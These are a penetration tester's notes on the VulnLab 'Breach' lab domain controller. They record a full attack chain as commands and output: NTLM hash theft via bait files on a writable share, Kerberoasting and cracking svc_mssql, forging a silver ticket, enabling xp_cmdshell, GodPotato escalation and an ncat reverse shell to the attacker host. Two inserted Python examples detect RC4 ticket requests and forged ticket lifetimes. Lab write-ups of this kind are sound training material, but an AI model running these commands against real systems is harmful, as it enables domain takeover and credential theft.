Here are my notes on the BREACH box from VulnLab.
BREACH: 10.10.94.173
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
|_http-title: IIS Windows Server
| http-methods:
|_ Potentially risky methods: TRACE
-No Robots.txt
-No Admin Page.
-No Dashboard Page.
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-02-02 17:02:50Z)
-No AS-REP roasting.
┌──(root㉿kali)-[/home/…/COMP/BREACH/10.10.94.173/share]
└─# sudo impacket-GetUserSPNs 'breach.vl/Julia.Wong:Computer1' -dc-ip 10.10.94.173 -request
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------------------- --------- -------- -------------------------- -------------------------- ----------
MSSQLSvc/breachdc.breach.vl:1433 svc_mssql 2022-02-17 05:43:08.106169 2024-02-02 12:02:55.474231
#The first request returned no ticket; nmap reports a -59m44s clock skew, so sync the clock before asking again.
┌──(root㉿kali)-[/home/…/COMP/BREACH/10.10.94.173/share]
└─# sudo rdate -n 10.10.94.173
Fri Feb 2 13:26:04 EST 2024
┌──(root㉿kali)-[/home/…/COMP/BREACH/10.10.94.173/share]
└─# sudo impacket-GetUserSPNs 'breach.vl/Julia.Wong:Computer1' -dc-ip 10.10.94.173 -request
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
-------------------------------- --------- -------- -------------------------- -------------------------- ----------
MSSQLSvc/breachdc.breach.vl:1433 svc_mssql 2022-02-17 05:43:08.106169 2024-02-02 12:02:55.474231
[-] CCache file is not found. Skipping...
$krb5tgs$23$*svc_mssql$BREACH.VL$breach.vl/svc_mssql*$6ca3d5457f064e1bbae73f3c88465cbc$[encrypted blob truncated]
┌──(root㉿kali)-[/home/…/COMP/BREACH/10.10.94.173/share]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash2.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Trustno1 (?)
1g 0:00:00:00 DONE (2024-02-02 14:26) 4.761g/s 248685p/s 248685c/s 248685C/s chloelouise..lili12
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
svc_mssql:Trustno1
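Added example, not from the notes or from VulnLab: the Kerberoast above seen from the defender's side, in Python. It parses the john-format header to show that the ticket is etype 23 (RC4-HMAC), which is why it fell to rockyou in under a second, and then runs a simple rule over constructed event 4769 records to flag accounts that obtained RC4 service tickets for user service accounts. The 4769 records and the shortened hash blob are constructed, and the record field names are assumptions rather than the exact Windows event schema.

```python
import re
from collections import defaultdict

# Constructed sample: the john-format line from the notes above, with the long
# encrypted blob replaced by a short placeholder.
SAMPLE_KRB5TGS = (
    "$krb5tgs$23$*svc_mssql$BREACH.VL$breach.vl/svc_mssql*"
    "$6ca3d5457f064e1bbae73f3c88465cbc$0123456789abcdef"
)

# Kerberos encryption type numbers as they appear in the hash header and in
# event 4769 (TicketEncryptionType is logged in hex: 0x17 = 23).
ETYPE_NAMES = {17: "aes128-cts-hmac-sha1-96", 18: "aes256-cts-hmac-sha1-96", 23: "rc4-hmac"}

_KRB5TGS_RE = re.compile(
    r"^\$krb5tgs\$(?P<etype>\d+)\$\*(?P<account>[^$]+)\$(?P<realm>[^$]+)\$(?P<target>[^*]+)\*\$"
)


def parse_krb5tgs(line):
    """Split the header of a john/hashcat krb5tgs line into its fields.

    Impacket fills the third starred field with either the SPN or domain/user
    depending on version, so it is reported neutrally as 'target'.
    """
    m = _KRB5TGS_RE.match(line)
    if not m:
        raise ValueError("not a krb5tgs hash line")
    etype = int(m.group("etype"))
    return {
        "etype": etype,
        "etype_name": ETYPE_NAMES.get(etype, "unknown"),
        "account": m.group("account"),
        "realm": m.group("realm"),
        "target": m.group("target"),
        # RC4 tickets are keyed directly from the NT hash, so a wordlist attack
        # on them is cheap; AES keys are PBKDF2-derived and crack far slower.
        "rc4": etype == 23,
    }


# Constructed sample of 4769 (service ticket request) events, reduced to the
# fields a detection would read. Machine accounts may legitimately use RC4 in
# some environments, so the rule only looks at user service principals.
SAMPLE_4769 = [
    {"account": "julia.wong@BREACH.VL", "service": "svc_mssql", "etype": 0x17, "client": "10.8.0.71"},
    {"account": "julia.wong@BREACH.VL", "service": "BREACHDC$", "etype": 0x12, "client": "10.8.0.71"},
    {"account": "BREACHDC$@BREACH.VL", "service": "krbtgt", "etype": 0x12, "client": "10.10.94.173"},
    {"account": "diana.pope@BREACH.VL", "service": "svc_mssql", "etype": 0x12, "client": "10.10.94.50"},
]


def flag_rc4_service_requests(events):
    """Map requesting account -> sorted list of user service principals for
    which it obtained RC4 (0x17) tickets; machine accounts and krbtgt are skipped."""
    hits = defaultdict(set)
    for e in events:
        svc = e["service"]
        if e["etype"] == 0x17 and not svc.endswith("$") and svc.lower() != "krbtgt":
            hits[e["account"]].add(svc)
    return {acct: sorted(svcs) for acct, svcs in hits.items()}


if __name__ == "__main__":
    print(parse_krb5tgs(SAMPLE_KRB5TGS))
    print(flag_rc4_service_requests(SAMPLE_4769))
```

On the domain side the fix is AES-only msDS-SupportedEncryptionTypes on svc_mssql plus a long random password or a gMSA, so that a ticket any domain user can request is not crackable from a wordlist.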
135/tcp open msrpc Microsoft Windows RPC
-No PrintNightmare.
┌──(root㉿kali)-[/home/…/BOXES/COMP/BREACH/10.10.94.173]
└─# rpcclient --user="" --command=enumdomusers -N 10.10.94.173
result was NT_STATUS_ACCESS_DENIED
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
┌──(root㉿kali)-[/home/…/BOXES/COMP/BREACH/10.10.94.173]
└─# crackmapexec smb 10.10.94.173 -u guest -p "" --shares
SMB 10.10.94.173 445 BREACHDC [*] Windows 10.0 Build 20348 x64 (name:BREACHDC) (domain:breach.vl) (signing:True) (SMBv1:False)
SMB 10.10.94.173 445 BREACHDC [+] breach.vl\guest:
SMB 10.10.94.173 445 BREACHDC [+] Enumerated shares
SMB 10.10.94.173 445 BREACHDC Share Permissions Remark
SMB 10.10.94.173 445 BREACHDC ----- ----------- ------
SMB 10.10.94.173 445 BREACHDC ADMIN$ Remote Admin
SMB 10.10.94.173 445 BREACHDC C$ Default share
SMB 10.10.94.173 445 BREACHDC IPC$ READ Remote IPC
SMB 10.10.94.173 445 BREACHDC NETLOGON Logon server share
SMB 10.10.94.173 445 BREACHDC share READ,WRITE #Interesting ?
SMB 10.10.94.173 445 BREACHDC SYSVOL Logon server share
SMB 10.10.94.173 445 BREACHDC Users READ #WEIRD ?
smb: \transfer\> cd ..
smb: \> dir
. D 0 Fri Feb 2 12:13:22 2024
.. DHS 0 Thu Feb 17 10:38:00 2022
finance D 0 Thu Feb 17 06:19:34 2022 #Writable
software D 0 Thu Feb 17 06:19:12 2022 #Writable
transfer D 0 Thu Feb 17 09:00:35 2022 #NOPE
┌──(root㉿kali)-[/home/kali/Kali-Tools/ntlm_theft/important]
└─# smbclient \\\\10.10.94.173\\share -U "guest"
Password for [WORKGROUP\guest]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Fri Feb 2 12:13:22 2024
.. DHS 0 Thu Feb 17 10:38:00 2022
finance D 0 Fri Feb 2 12:29:05 2024
software D 0 Fri Feb 2 12:32:30 2024
transfer D 0 Thu Feb 17 09:00:35 2022
cd
7863807 blocks of size 4096. 2849053 blocks available
smb: \> cd transfer
smb: \transfer\> ls
. D 0 Thu Feb 17 09:00:35 2022
.. D 0 Fri Feb 2 12:13:22 2024
claire.pope D 0 Thu Feb 17 06:21:35 2022
diana.pope D 0 Thu Feb 17 06:21:19 2022
julia.wong D 0 Thu Feb 17 06:24:39 2022
7863807 blocks of size 4096. 2849053 blocks available
smb: \transfer\> put important.pdf
putting file important.pdf as \transfer\important.pdf (2.1 kb/s) (average 2.1 kb/s)
smb: \transfer\> put important.scf
putting file important.scf as \transfer\important.scf (0.2 kb/s) (average 1.1 kb/s)
smb: \transfer\> put important.url
important.url does not exist
smb: \transfer\> put important.rtf
\putting file important.rtf as \transfer\important.rtf (0.3 kb/s) (average 0.9 kb/s)
smb: \transfer\> put important.lnk
putting file important.lnk as \transfer\important.lnk (5.3 kb/s) (average 2.1 kb/s)
smb: \transfer\>
#Use the ntlm_theft files to capture a hash with Responder.
#Julia.Wong hooked.
┌──(root㉿kali)-[/home/…/COMP/BREACH/10.10.94.173/share]
└─# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Computer1 (Julia.Wong)
1g 0:00:00:00 DONE (2024-02-02 14:20) 3.125g/s 377600p/s 377600c/s 377600C/s bratz1234..042602
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed.
#Upload it to every writable folder, just in case. #BREACH
smb: \Public\Documents\> put test.txt
putting file test.txt as \Public\Documents\test.txt (0.0 kb/s) (average 0.0 kb/s)
\Public folder in the Users share can be writable.
smb: \Public\> cd Libraries
smb: \Public\Libraries\> doir
doir: command not found
smb: \Public\Libraries\> dir
. DHR 0 Sat May 8 04:34:49 2021
.. DR 0 Tue Sep 14 23:08:59 2021
desktop.ini AHS 175 Sat May 8 04:18:31 2021
RecordedTV.library-ms A 999 Sat May 8 04:18:31 2021
7863807 blocks of size 4096. 2851817 blocks available
smb: \Public\Libraries\>
sudo impacket-lookupsid Guest@10.10.94.173 | tee usernames
grep SidTypeUser usernames | awk '{print $2}' | cut -d "\\" -f2 > users.txt
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: breach.vl0., Site: Default-First-Site-Name)
-LDAP V3 = NOPE.
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
1433/tcp open ms-sql-s Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ssl-date: 2024-02-02T17:09:13+00:00; -59m44s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2024-02-02T17:03:30
|_Not valid after: 2054-02-02T17:03:30
┌──(root㉿kali)-[/home/…/COMP/BREACH/10.10.94.173/share]
└─# impacket-mssqlclient svc_mssql:Trustno1@10.10.94.173 -windows-auth
Impacket v0.12.0.dev1+20240130.154745.97007e84 - Copyright 2023 Fortra
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (BREACH\svc_mssql guest@master)> enable_xp_cmdshell
ERROR: Line 1: You do not have permission to run the RECONFIGURE statement.
-NO HASH STEALING.
Silver Ticket:
Service account password - can be converted to its NT hash - CHECK ! Trustno1:69596C7AA1E8DAEE17F8E78870E25A5C
SPN - MSSQLSvc/breachdc.breach.vl:1433
[*] Domain SID is: S-1-5-21-2330692793-3312915120-706255856
impacket-ticketer -nthash 69596C7AA1E8DAEE17F8E78870E25A5C -domain-sid S-1-5-21-2330692793-3312915120-706255856 -domain breach.vl -spn MSSQLSvc/breachdc.breach.vl:1433 -user-id 500 Administrator
impacket-ticketer -nthash 69596C7AA1E8DAEE17F8E78870E25A5C -domain-sid S-1-5-21-2330692793-3312915120-706255856 -domain breach.vl -dc-ip 10.10.94.173 -spn MSSQLSvc/breachdc.breach.vl:1433 administrator
┌──(root㉿kali)-[/home/…/BOXES/COMP/BREACH/10.10.94.173]
└─# impacket-ticketer -nthash 69596C7AA1E8DAEE17F8E78870E25A5C -domain-sid S-1-5-21-2330692793-3312915120-706255856 -domain breach.vl -spn MSSQLSvc/breachdc.breach.vl:1433 -user-id 500 Administrator
Impacket v0.12.0.dev1+20240130.154745.97007e84 - Copyright 2023 Fortra
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for breach.vl/Administrator
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncTGSRepPart
[*] Saving ticket in Administrator.ccache
┌──(root㉿kali)-[/home/…/BOXES/COMP/BREACH/10.10.94.173]
└─# pwd
/home/kali/BOXES/COMP/BREACH/10.10.94.173
┌──(root㉿kali)-[/home/…/BOXES/COMP/BREACH/10.10.94.173]
└─# export KRB5CCNAME=/home/kali/BOXES/COMP/BREACH/10.10.94.173/Administrator.ccache
┌──(root㉿kali)-[/home/…/BOXES/COMP/BREACH/10.10.94.173]
└─# klist
Ticket cache: FILE:/home/kali/BOXES/COMP/BREACH/10.10.94.173/Administrator.ccache
Default principal: Administrator@BREACH.VL
Valid starting Expires Service principal
02/02/2024 15:01:36 01/30/2034 15:01:36 MSSQLSvc/breachdc.breach.vl:1433@BREACH.VL
renew until 01/30/2034 15:01:36
breachdc.breach.vl
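Added example, not from the notes: a check that would catch the forged ticket in the klist output above by its lifetime. A service ticket issued by the KDC lives at most as long as the domain's "Maximum lifetime for service ticket" policy (600 minutes by default, assumed here as the policy value), whereas the ticket above is valid for ten years. The first sample is the klist output from these notes; the second is a constructed normal ticket for contrast.

```python
import re
from datetime import datetime, timedelta

# klist output copied from the notes above (the forged silver ticket).
SAMPLE_KLIST = """Ticket cache: FILE:/home/kali/BOXES/COMP/BREACH/10.10.94.173/Administrator.ccache
Default principal: Administrator@BREACH.VL
Valid starting       Expires              Service principal
02/02/2024 15:01:36  01/30/2034 15:01:36  MSSQLSvc/breachdc.breach.vl:1433@BREACH.VL
\trenew until 01/30/2034 15:01:36
"""

# Constructed contrast case: a ticket with a normal 10-hour lifetime.
SAMPLE_KLIST_NORMAL = """Default principal: julia.wong@BREACH.VL
Valid starting       Expires              Service principal
02/02/2024 12:02:55  02/02/2024 22:02:55  cifs/breachdc.breach.vl@BREACH.VL
"""

# AD default for "Maximum lifetime for service ticket"; assumed as the policy value.
MAX_SERVICE_TICKET_AGE = timedelta(minutes=600)

_TS = r"\d{2}/\d{2}/\d{4} \d{2}:\d{2}:\d{2}"
_TICKET_RE = re.compile(r"^(" + _TS + r")\s+(" + _TS + r")\s+(\S+)\s*$")
_FMT = "%m/%d/%Y %H:%M:%S"


def parse_klist(text):
    """Extract (start, end, spn, lifetime) for each ticket line in MIT klist output."""
    tickets = []
    for line in text.splitlines():
        m = _TICKET_RE.match(line.strip())
        if not m:
            continue  # header, cache path, or 'renew until' continuation
        start = datetime.strptime(m.group(1), _FMT)
        end = datetime.strptime(m.group(2), _FMT)
        tickets.append({"start": start, "end": end, "spn": m.group(3), "lifetime": end - start})
    return tickets


def suspicious_tickets(text, max_age=MAX_SERVICE_TICKET_AGE):
    """Tickets whose lifetime exceeds what the KDC would ever issue under policy."""
    return [t for t in parse_klist(text) if t["lifetime"] > max_age]


if __name__ == "__main__":
    for t in suspicious_tickets(SAMPLE_KLIST):
        print(f"{t['spn']}: lifetime {t['lifetime'].days} days, exceeds {MAX_SERVICE_TICKET_AGE}")
```

A forged service ticket never touches the KDC, so the DC's 4769 log will not show it; the anomaly is visible in the ticket itself, and the durable fix is rotating svc_mssql to a long random password or a gMSA so the service key cannot be recovered from a wordlist in the first place.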
┌──(root㉿kali)-[/home/kali/BOXES/COMP/BREACH]
└─# impacket-mssqlclient -k breachdc.breach.vl
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(BREACHDC\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208)
[!] Press help for extra shell commands
SQL (BREACH\Administrator dbo@master)> enable_xp_cmdshell
[*] INFO(BREACHDC\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
[*] INFO(BREACHDC\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (BREACH\Administrator dbo@master)> xp_cmdshell whoami
output
----------------
breach\svc_mssql
NULL
SQL (BREACH\Administrator dbo@master)>
/etc/hosts:
10.10.67.63 breach.vl BREACH.VL breachdc.breach.vl BREACHDC.BREACH.VL
#Convert the xp_cmdshell access into a USER SHELL as svc_mssql.
PRIV ESC:
SeImpersonatePrivilege - PRIVILEGE ESCALATION.
GodPotato - WORKS !
GODPOTATO.exe -cmd "cmd /c whoami"
GODPOTATO.exe -cmd "cmd /c C:\Users\svc_mssql\ncat.exe -nv 10.8.0.71 3333 -e CMD"
SYSTEM SHELL !
C:\Users\Administrator\Desktop>dir
Volume in drive C has no label.
Volume Serial Number is B465-02B6
Directory of C:\Users\Administrator\Desktop
02/17/2022 10:51 AM <DIR> .
02/17/2022 09:35 AM <DIR> ..
02/17/2022 10:52 AM 36 root.txt
1 File(s) 36 bytes
2 Dir(s) 10,590,625,792 bytes free
C:\Users\Administrator\Desktop>type root.txt
type root.txt
[REDACTED]
C:\Users\Administrator\Desktop>
ROOT.TXT: [REDACTED]
C:\share\transfer\julia.wong>dir
dir
Volume in drive C has no label.
Volume Serial Number is B465-02B6
Directory of C:\share\transfer\julia.wong
02/17/2022 11:24 AM <DIR> .
02/17/2022 02:00 PM <DIR> ..
02/17/2022 11:25 AM 36 local.txt
1 File(s) 36 bytes
2 Dir(s) 10,590,130,176 bytes free
C:\share\transfer\julia.wong>type local.txt
type local.txt
[REDACTED]
C:\share\transfer\julia.wong>
LOCAL.TXT: [REDACTED]
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: breach.vl0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2024-02-02T17:03:40+00:00; -59m44s from scanner time.
| ssl-cert: Subject: commonName=BREACHDC.breach.vl
| Not valid before: 2024-02-01T17:02:17
|_Not valid after: 2024-08-02T17:02:17
| rdp-ntlm-info:
| Target_Name: BREACH
| NetBIOS_Domain_Name: BREACH
| NetBIOS_Computer_Name: BREACHDC
| DNS_Domain_Name: breach.vl
| DNS_Computer_Name: BREACHDC.breach.vl
| DNS_Tree_Name: breach.vl
| Product_Version: 10.0.20348
|_ System_Time: 2024-02-02T17:03:00+00:00
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
64073/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
64295/tcp open msrpc Microsoft Windows RPC
64307/tcp open msrpc Microsoft Windows RPC
Service Info: Host: BREACHDC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: -59m44s, deviation: 0s, median: -59m44s
| smb2-security-mode:
| 311:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-02-02T17:03:04
|_ start_date: N/A